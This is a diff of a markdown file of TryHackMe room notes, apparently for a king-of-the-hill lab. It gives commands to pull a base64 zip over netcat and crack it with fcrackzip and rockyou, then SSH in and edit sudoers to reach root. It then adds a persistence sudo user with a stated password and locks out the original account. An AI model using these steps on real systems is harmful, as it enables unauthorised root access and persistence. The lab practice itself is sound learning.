perng/tryhackme-rooms/rooms.md

 sudo chmod -sx /usr/lib/git-core/git
 ```

+# Fortune:
+Requires: fcrackzip

+nc <BOX_IP> 3333
+#returns base 64 hash of a file.
+Go here https://base64.guru/converter/decode/file and get the zip file.
+fcrackzip -v -u -D -p <location of rockyou.txt> application.zip
+Open the zip with the password you got.
+Should contain password for fortune account.
+ssh fortuna@<BOX IP>
+sudo pico /etc/sudoers
+Replace pico in sudoers file with ALL. (e.g. fortuna    ALL=(ALL:ALL) ALL)
+sudo su
+you're root
+stuff to do:
+	change password to fortuna.
+	Remove fortuna from /etc/sudoers and add another user that you have credentials for.

 # afterwards stuff:
 sudo useradd technoblade(i typically use password neverdie)
 sudo usermod -aG sudo technoblade